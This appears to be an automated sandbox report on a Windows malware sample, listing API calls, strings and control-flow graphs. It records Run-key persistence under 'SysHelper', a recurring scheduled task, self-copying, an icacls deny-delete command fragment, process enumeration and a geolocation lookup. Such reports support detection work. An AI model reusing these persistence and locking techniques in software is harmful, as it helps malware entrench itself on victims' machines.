45623->45646 45624 42ff71 GetTimeZoneInformation 45624->45631 45627 42feaa 45627->45631 45647 433f99 58 API calls 2 library calls 45627->45647 45628 42ffd8 WideCharToMultiByte 45628->45631 45630 42feb8 45648 441667 78 API calls 3 library calls 45630->45648 45631->45624 45631->45628 45632 430010 WideCharToMultiByte 45631->45632 45637 43ff8e 58 API calls __tzset_nolock 45631->45637 45642 423c2d 61 API calls UnDecorator::getZName 45631->45642 45643 430157 __tzset_nolock __setmode 45631->45643 45652 4242fd 8 API calls 2 library calls 45631->45652 45653 420bed 58 API calls 2 library calls 45631->45653 45654 4300d7 LeaveCriticalSection _doexit 45631->45654 45632->45631 45635 42ff0c _strlen 45650 428cde 58 API calls 2 library calls 45635->45650 45636 42fed9 type_info::operator!= 45636->45631 45636->45635 45649 420bed 58 API calls 2 library calls 45636->45649 45637->45631 45640 42ff1a _strlen 45640->45631 45651 42c0fd 58 API calls __get_pgmptr 45640->45651 45642->45631 45643->45594 45644->45591 45645->45623 45646->45627 45647->45630 45648->45636 45649->45635 45650->45640 45651->45631 45652->45631 45653->45631 45654->45631 45655->45606 45656->45608 45684 42019c 45657->45684 45660 4227d4 45692 425208 58 API calls __getptd_noexit 45660->45692 45662 4227d9 45693 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 45662->45693 45663 4227e9 MultiByteToWideChar 45665 422804 GetLastError 45663->45665 45666 422815 45663->45666 45694 4251e7 58 API calls 3 library calls 45665->45694 45695 428cde 58 API calls 2 library calls 45666->45695 45667 40d7a3 45667->45292 45670 422810 45699 420bed 58 API calls 2 library calls 45670->45699 45671 42281d 45671->45670 45672 422825 MultiByteToWideChar 45671->45672 45672->45665 45674 42283f 45672->45674 45696 428cde 58 API calls 2 library calls 45674->45696 45675 4228a0 45700 420bed 58 API calls 2 library calls 45675->45700 45678 42284a 45678->45670 45697 42d51e 88 API calls 3 library calls 45678->45697 45680 422866 45680->45670 45681 42286f WideCharToMultiByte 45680->45681 45681->45670 45682 42288b GetLastError 45681->45682 45698 4251e7 58 API calls 3 library calls 45682->45698 45685 4201ad 45684->45685 45691 4201fa 45684->45691 45701 425007 58 API calls 2 library calls 45685->45701 45687 4201b3 45688 4201da 45687->45688 45702 4245dc 58 API calls 6 library calls 45687->45702 45688->45691 45703 42495e 58 API calls 6 library calls 45688->45703 45691->45660 45691->45663 45692->45662 45693->45667 45694->45670 45695->45671 45696->45678 45697->45680 45698->45670 45699->45675 45700->45667 45701->45687 45702->45688 45703->45691 45704->45337 45705->45337 45714 427ad7 GetModuleHandleExW 45706->45714 45709->45332 45710->45336 45711->45339 45712->45326 45713->45339 45715 427af0 GetProcAddress 45714->45715 45716 427b07 ExitProcess 45714->45716 45715->45716 45717 427b02 45715->45717 45717->45716 45718->45351 45725 427e1a __setmode 45724->45725 45726 428af7 __lock 51 API calls 45725->45726 45727 427e21 45726->45727 45728 427eda __cinit 45727->45728 45729 427e4f DecodePointer 45727->45729 45744 427f28 45728->45744 45729->45728 45731 427e66 DecodePointer 45729->45731 45737 427e76 45731->45737 45733 427f37 __setmode 45733->45041 45735 427e83 EncodePointer 45735->45737 45736 427f1f 45738 427b0b __heap_alloc 3 API calls 45736->45738 45737->45728 45737->45735 45739 427e93 DecodePointer EncodePointer 45737->45739 45740 427f28 45738->45740 45742 427ea5 DecodePointer DecodePointer 45739->45742 45741 427f35 45740->45741 45749 428c81 LeaveCriticalSection 45740->45749 45741->45041 45742->45737 45745 427f08 45744->45745 45746 427f2e 45744->45746 45745->45733 45748 428c81 LeaveCriticalSection 45745->45748 45750 428c81 LeaveCriticalSection 45746->45750 45748->45736 45749->45741 45750->45745

                    Executed Functions

                    Function 00419F90 Relevance: 176.6, APIs: 65, Strings: 35, Instructions: 1565COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                      • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                      • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                    • GetCurrentProcess.KERNEL32 ref: 00419FC4
                    • GetLastError.KERNEL32 ref: 00419FD2
                    • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                    • GetLastError.KERNEL32 ref: 00419FE4
                    • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0077B068,?), ref: 0041A0BB
                    • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                    • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                      • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                      • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                      • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                    • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                    • API String ID: 2957410896-3144399390
                    • Opcode ID: d015b84eba4a4434be79b711f18dbc426407edb0061b691a0cb40fbdcb0bdc00
                    • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                    • Opcode Fuzzy Hash: d015b84eba4a4434be79b711f18dbc426407edb0061b691a0cb40fbdcb0bdc00
                    • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B
                    Function 0040D240 Relevance: 58.5, APIs: 25, Strings: 8, Instructions: 702comCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 688 40d240-40d274 CoInitialize 689 40d276-40d278 688->689 690 40d27d-40d2dd CoInitializeSecurity call 414690 CoCreateInstance 688->690 691 40da8e-40da92 689->691 697 40d2e3-40d3ca VariantInit * 4 VariantClear * 4 690->697 698 40da3c-40da44 CoUninitialize 690->698 693 40da94-40da9c call 422587 691->693 694 40da9f-40dab1 691->694 693->694 704 40d3e2-40d3fe call 40b140 697->704 705 40d3cc-40d3dd CoUninitialize 697->705 700 40da69-40da6d 698->700 702 40da7a-40da8a 700->702 703 40da6f-40da77 call 422587 700->703 702->691 703->702 711 40d400-40d402 704->711 712 40d404 704->712 705->700 713 40d406-40d424 call 40b1d0 711->713 712->713 717 40d426-40d437 CoUninitialize 713->717 718 40d43c-40d451 call 40b140 713->718 717->700 722 40d453-40d455 718->722 723 40d457 718->723 724 40d459-40d494 call 40b1d0 722->724 723->724 730 40d496-40d4a7 CoUninitialize 724->730 731 40d4ac-40d4c2 724->731 730->700 734 40d4c8-40d4dd call 40b140 731->734 735 40da2a-40da37 731->735 739 40d4e3 734->739 740 40d4df-40d4e1 734->740 735->698 741 40d4e5-40d508 call 40b1d0 739->741 740->741 741->735 746 40d50e-40d524 741->746 746->735 748 40d52a-40d542 746->748 748->735 751 40d548-40d55e 748->751 751->735 753 40d564-40d57c 751->753 753->735 756 40d582-40d59b 753->756 756->735 758 40d5a1-40d5b6 call 40b140 756->758 761 40d5b8-40d5ba 758->761 762 40d5bc 758->762 763 40d5be-40d5e1 call 40b1d0 761->763 762->763 763->735 768 40d5e7-40d5fd 763->768 768->735 770 40d603-40d626 768->770 770->735 773 40d62c-40d651 770->773 773->735 776 40d657-40d666 773->776 776->735 778 40d66c-40d681 call 40b140 776->778 781 40d683-40d685 778->781 782 40d687 778->782 783 40d689-40d6a3 call 40b1d0 781->783 782->783 783->735 787 40d6a9-40d6be call 40b140 783->787 790 40d6c0-40d6c2 787->790 791 40d6c4 787->791 792 40d6c6-40d6e0 call 40b1d0 790->792 791->792 792->735 796 40d6e6-40d6f4 792->796 796->735 798 40d6fa-40d70f call 40b140 796->798 801 40d711-40d713 798->801 802 40d715 798->802 803 40d717-40d731 call 40b1d0 801->803 802->803 803->735 807 40d737-40d74c call 40b140 803->807 810 40d752 807->810 811 40d74e-40d750 807->811 812 40d754-40d76e call 40b1d0 810->812 811->812 812->735 816 40d774-40d7ce call 423aaf call 423551 call 4228e0 call 412c40 call 412900 812->816 827 40d7d0 816->827 828 40d7d2-40d7e3 call 40b140 816->828 827->828 831 40d7e5-40d7e7 828->831 832 40d7e9 828->832 833 40d7eb-40d819 call 40b1d0 call 413210 831->833 832->833 833->735 840 40d81f-40d835 833->840 840->735 842 40d83b-40d85e 840->842 842->735 845 40d864-40d889 842->845 845->735 848 40d88f-40d8ab call 40b140 845->848 851 40d8b1 848->851 852 40d8ad-40d8af 848->852 853 40d8b3-40d8cd call 40b1d0 851->853 852->853 857 40d8dd-40d8f2 call 40b140 853->857 858 40d8cf-40d8d8 853->858 862 40d8f4-40d8f6 857->862 863 40d8f8 857->863 858->735 864 40d8fa-40d91d call 40b1d0 862->864 863->864 864->735 869 40d923-40d98d call 40b400 VariantInit * 2 call 40b140 864->869 874 40d993 869->874 875 40d98f-40d991 869->875 876 40d995-40da0e call 40b1d0 VariantClear * 3 874->876 875->876 880 40da10-40da27 call 42052a 876->880 881 40da46-40da67 CoUninitialize 876->881 880->735 881->700
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 0040D26C
                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
                    • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
                    • VariantInit.OLEAUT32(?), ref: 0040D2F0
                    • VariantInit.OLEAUT32(?), ref: 0040D309
                    • VariantInit.OLEAUT32(?), ref: 0040D322
                    • VariantInit.OLEAUT32(?), ref: 0040D33B
                    • VariantClear.OLEAUT32(?), ref: 0040D397
                    • VariantClear.OLEAUT32(?), ref: 0040D3A4
                    • VariantClear.OLEAUT32(?), ref: 0040D3B1
                    • VariantClear.OLEAUT32(?), ref: 0040D3C2
                    • CoUninitialize.OLE32 ref: 0040D3D5
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                    • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                    • API String ID: 2496729271-1738591096
                    • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                    • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
                    • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                    • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95
                    Function 00411CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382stringregistrylibraryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 606 411cd0-411d1a call 42f7c0 RegOpenKeyExW 609 411d20-411d8d call 42b420 RegQueryValueExW RegCloseKey 606->609 610 412207-412216 606->610 613 411d93-411d9c 609->613 614 411d8f-411d91 609->614 616 411da0-411da9 613->616 615 411daf-411dcb call 415c10 614->615 620 411dd1-411df8 lstrlenA call 413520 615->620 621 411e7c-411e87 615->621 616->616 617 411dab-411dad 616->617 617->615 629 411e28-411e2c 620->629 630 411dfa-411dfe 620->630 622 411e94-411f34 LoadLibraryW GetProcAddress GetCommandLineW CommandLineToArgvW lstrcpyW PathFindFileNameW UuidCreate UuidToStringW 621->622 623 411e89-411e91 call 422587 621->623 633 411f36-411f38 622->633 634 411f3a-411f3f 622->634 623->622 631 411e3c-411e50 PathFileExistsW 629->631 632 411e2e-411e39 call 422587 629->632 635 411e00-411e08 call 422587 630->635 636 411e0b-411e23 call 4145a0 630->636 631->621 642 411e52-411e57 631->642 632->631 640 411f4f-411f96 call 415c10 RpcStringFreeW PathAppendW CreateDirectoryW 633->640 641 411f40-411f49 634->641 635->636 636->629 653 411f98-411fa0 640->653 654 411fce-411fe9 640->654 641->641 645 411f4b-411f4d 641->645 646 411e59-411e5e 642->646 647 411e6a-411e6e 642->647 645->640 646->647 649 411e60-411e65 call 414690 646->649 647->610 651 411e74-411e77 647->651 649->647 655 4121ff-412204 call 422587 651->655 658 411fa2-411fa4 653->658 659 411fa6-411faf 653->659 656 411feb-411fed 654->656 657 411fef-411ff8 654->657 655->610 662 41200f-412076 call 415c10 PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 656->662 663 412000-412009 657->663 664 411fbf-411fc9 call 415c10 658->664 661 411fb0-411fb9 659->661 661->661 666 411fbb-411fbd 661->666 671 4121d1-4121d5 662->671 672 41207c-412107 call 42b420 lstrcpyW lstrcatW * 2 lstrlenW RegSetValueExW RegCloseKey 662->672 663->663 668 41200b-41200d 663->668 664->654 666->664 668->662 673 4121e2-4121fa 671->673 674 4121d7-4121df call 422587 671->674 680 412115-4121a8 call 42b420 SetLastError lstrcpyW lstrcatW * 2 CreateProcessW 672->680 681 412109-412110 call 413260 672->681 673->610 677 4121fc 673->677 674->673 677->655 685 4121b2-4121b8 680->685 686 4121aa-4121b0 GetLastError 680->686 681->680 687 4121c0-4121cf WaitForSingleObject 685->687 686->671 687->671 687->687
                    APIs
                    • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                    • _memset.LIBCMT ref: 00411D3B
                    • RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                    • lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                    • PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                    • LoadLibraryW.KERNEL32(Shell32.dll,?,?), ref: 00411E99
                    • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 00411EA5
                    • GetCommandLineW.KERNEL32 ref: 00411EB4
                    • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00411EBF
                    • lstrcpyW.KERNEL32(?,00000000), ref: 00411ECE
                    • PathFindFileNameW.SHLWAPI(?), ref: 00411EDB
                    • UuidCreate.RPCRT4(?), ref: 00411EFC
                    • UuidToStringW.RPCRT4(?,?), ref: 00411F14
                    • RpcStringFreeW.RPCRT4(00000000), ref: 00411F64
                    • PathAppendW.SHLWAPI(?,?), ref: 00411F83
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00411F8E
                    • PathAppendW.SHLWAPI(?,?,?,?), ref: 0041202D
                    • DeleteFileW.KERNEL32(?), ref: 00412036
                    • CopyFileW.KERNEL32(?,?,00000000), ref: 0041204C
                    • RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 0041206E
                    • _memset.LIBCMT ref: 00412090
                    • lstrcpyW.KERNEL32(?,005002FC), ref: 004120AA
                    • lstrcatW.KERNEL32(?,?), ref: 004120C0
                    • lstrcatW.KERNEL32(?," --AutoStart), ref: 004120CE
                    • lstrlenW.KERNEL32(?), ref: 004120D7
                    • RegSetValueExW.KERNEL32(00000000,SysHelper,00000000,00000002,?,00000000), ref: 004120F3
                    • RegCloseKey.ADVAPI32(00000000), ref: 004120FC
                    • _memset.LIBCMT ref: 00412120
                    • SetLastError.KERNEL32(00000000), ref: 00412146
                    • lstrcpyW.KERNEL32(?,icacls "), ref: 00412158
                    • lstrcatW.KERNEL32(?,?), ref: 0041216D
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: FilePath$_memsetlstrcatlstrcpy$AppendCloseCommandCreateLineOpenStringUuidValuelstrlen$AddressArgvCopyDeleteDirectoryErrorExistsFindFreeLastLibraryLoadNameProcQuery
                    • String ID: " --AutoStart$" --AutoStart$" /deny *S-1-1-0:(OI)(CI)(DE,DC)$D$SHGetFolderPathW$Shell32.dll$Software\Microsoft\Windows\CurrentVersion\Run$SysHelper$icacls "
                    • API String ID: 2589766509-1182136429
                    • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                    • Instruction ID: 715e32bd1e023583792331b7dbf49be96a7b9f80df69a50876529e1503cb0a0b
                    • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                    • Instruction Fuzzy Hash: 51E14171D00219EBDF24DBA0DD89FEE77B8BF04304F14416AE609E6191EB786A85CF58
                    Function 00412220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                    • GetCommandLineW.KERNEL32 ref: 00412235
                    • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                    • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                    • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                    • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                    • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                    • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                    • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                    • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                    • CloseHandle.KERNEL32(00000000), ref: 00412347
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                    • API String ID: 3668891214-3807497772
                    • Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                    • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                    • Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                    • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5
                    Function 0040CF10 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228networkfileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 903 40cf10-40cfb0 call 42f7c0 call 42b420 InternetOpenW call 415c10 InternetOpenUrlW 910 40cfb2-40cfb4 903->910 911 40cfb9-40cffb InternetReadFile InternetCloseHandle * 2 call 4156d0 903->911 912 40d213-40d217 910->912 916 40d000-40d01d 911->916 914 40d224-40d236 912->914 915 40d219-40d221 call 422587 912->915 915->914 918 40d023-40d02c 916->918 919 40d01f-40d021 916->919 922 40d030-40d035 918->922 921 40d039-40d069 call 4156d0 call 414300 919->921 928 40d1cb 921->928 929 40d06f-40d08b call 413010 921->929 922->922 924 40d037 922->924 924->921 931 40d1cd-40d1d1 928->931 935 40d0b9-40d0bd 929->935 936 40d08d-40d091 929->936 933 40d1d3-40d1db call 422587 931->933 934 40d1de-40d1f4 931->934 933->934 938 40d201-40d20f 934->938 939 40d1f6-40d1fe call 422587 934->939 944 40d0cd-40d0e1 call 414300 935->944 945 40d0bf-40d0ca call 422587 935->945 941 40d093-40d09b call 422587 936->941 942 40d09e-40d0b4 call 413d40 936->942 938->912 939->938 941->942 942->935 944->928 954 40d0e7-40d149 call 413010 944->954 945->944 957 40d150-40d15a 954->957 958 40d160-40d162 957->958 959 40d15c-40d15e 957->959 961 40d165-40d16a 958->961 960 40d16e-40d18b call 40b650 959->960 965 40d19a-40d19e 960->965 966 40d18d-40d18f 960->966 961->961 962 40d16c 961->962 962->960 965->957 968 40d1a0 965->968 966->965 967 40d191-40d198 966->967 967->965 969 40d1c7-40d1c9 967->969 970 40d1a2-40d1a6 968->970 969->970 971 40d1b3-40d1c5 970->971 972 40d1a8-40d1b0 call 422587 970->972 971->931 972->971
                    APIs
                    • _memset.LIBCMT ref: 0040CF4A
                    • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                    • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                    • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                    • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                    Strings
                    • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                    • "country_code":", xrefs: 0040CFE1
                    • Microsoft Internet Explorer, xrefs: 0040CF5A
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleOpen$FileRead_memset
                    • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                    • API String ID: 1485416377-2962370585
                    • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                    • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                    • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                    • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59
                    Function 00423576 Relevance: 15.3, APIs: 10, Instructions: 258COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 975 423576-42358f 976 423591-42359b call 425208 call 4242d2 975->976 977 4235a9-4235be call 42b420 975->977 986 4235a0 976->986 977->976 982 4235c0-4235c3 977->982 984 4235d7-4235dd 982->984 985 4235c5 982->985 989 4235e9 call 42fb64 984->989 990 4235df 984->990 987 4235c7-4235c9 985->987 988 4235cb-4235d5 call 425208 985->988 991 4235a2-4235a8 986->991 987->984 987->988 988->986 996 4235ee-4235fa call 42f803 989->996 990->988 993 4235e1-4235e7 990->993 993->988 993->989 999 423600-42360c call 42f82d 996->999 1000 4237e5-4237ef call 4242fd 996->1000 999->1000 1005 423612-42361e call 42f857 999->1005 1005->1000 1008 423624-42362b 1005->1008 1009 42369b-4236a6 call 42f939 1008->1009 1010 42362d 1008->1010 1009->991 1016 4236ac-4236af 1009->1016 1012 423637-423653 call 42f939 1010->1012 1013 42362f-423635 1010->1013 1012->991 1020 423659-42365c 1012->1020 1013->1009 1013->1012 1018 4236b1-4236ba call 42fbb4 1016->1018 1019 4236de-4236eb 1016->1019 1018->1019 1028 4236bc-4236dc 1018->1028 1022 4236ed-4236fc call 4305a0 1019->1022 1023 423662-42366b call 42fbb4 1020->1023 1024 42379e-4237a0 1020->1024 1031 423709-423730 call 4304f0 call 4305a0 1022->1031 1032 4236fe-423706 1022->1032 1023->1024 1033 423671-423689 call 42f939 1023->1033 1024->991 1028->1022 1041 423732-42373b 1031->1041 1042 42373e-423765 call 4304f0 call 4305a0 1031->1042 1032->1031 1033->991 1038 42368f-423696 1033->1038 1038->1024 1041->1042 1047 423773-423782 call 4304f0 1042->1047 1048 423767-423770 1042->1048 1051 423784 1047->1051 1052 4237af-4237c8 1047->1052 1048->1047 1055 423786-423788 1051->1055 1056 42378a-423798 1051->1056 1053 4237ca-4237e3 1052->1053 1054 42379b 1052->1054 1053->1024 1054->1024 1055->1056 1057 4237a5-4237a7 1055->1057 1056->1054 1057->1024 1058 4237a9 1057->1058 1058->1052 1059 4237ab-4237ad 1058->1059 1059->1024 1059->1052
                    APIs
                    • _memset.LIBCMT ref: 004235B1
                      • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                    • __gmtime64_s.LIBCMT ref: 0042364A
                    • __gmtime64_s.LIBCMT ref: 00423680
                    • __gmtime64_s.LIBCMT ref: 0042369D
                    • __allrem.LIBCMT ref: 004236F3
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                    • __allrem.LIBCMT ref: 00423726
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                    • __allrem.LIBCMT ref: 0042375B
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                    Memory Dump Source
                    • Source File: 00000006.00000002.1298140935.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000006.00000002.1298140935.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                    • Associated: 00000006.00000002.1298140935.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_400000_DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.jbxd
                    Yara matches
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                    • String ID:
                    • API String ID: 1503770280-0
                    • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                    • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                    • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
